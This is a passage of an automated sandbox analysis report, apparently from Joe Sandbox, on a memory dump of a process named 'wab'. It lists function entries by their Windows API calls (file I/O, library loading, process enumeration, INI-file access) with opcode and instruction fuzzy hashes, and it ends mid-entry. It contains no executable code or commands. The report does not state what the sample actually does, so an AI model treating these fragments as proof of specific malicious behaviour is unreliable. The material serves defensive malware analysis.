                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • GetLastError.KERNEL32 ref: 004175A2
                    • GetLastError.KERNEL32 ref: 004175A8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$FilePointer
                    • String ID:
                    • API String ID: 1156039329-0
                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ChangeCloseCreateFindNotificationTime
                    • String ID:
                    • API String ID: 1631957507-0
                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Temp$DirectoryFileNamePathWindows
                    • String ID:
                    • API String ID: 1125800050-0
                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: BINARY
                    • API String ID: 2221118986-907554435
                    • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                    • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                    • String ID:
                    • API String ID: 1161345128-0
                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /stext
                    • API String ID: 2081463915-3817206916
                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                    • String ID:
                    • API String ID: 159017214-0
                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                    APIs
                    Strings
                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: malloc
                    • String ID: failed to allocate %u bytes of memory
                    • API String ID: 2803490479-1168259600
                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset
                    • String ID:
                    • API String ID: 1065087418-0
                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                    APIs
                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                    • String ID:
                    • API String ID: 1481295809-0
                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                    APIs
                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                    APIs
                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                    APIs
                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itowmemset
                    • String ID:
                    • API String ID: 4232544981-0
                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                    APIs
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FileModuleName
                    • String ID:
                    • API String ID: 3859505661-0
                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                    APIs
                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                    APIs
                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                    APIs
                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                    APIs
                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                    APIs
                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
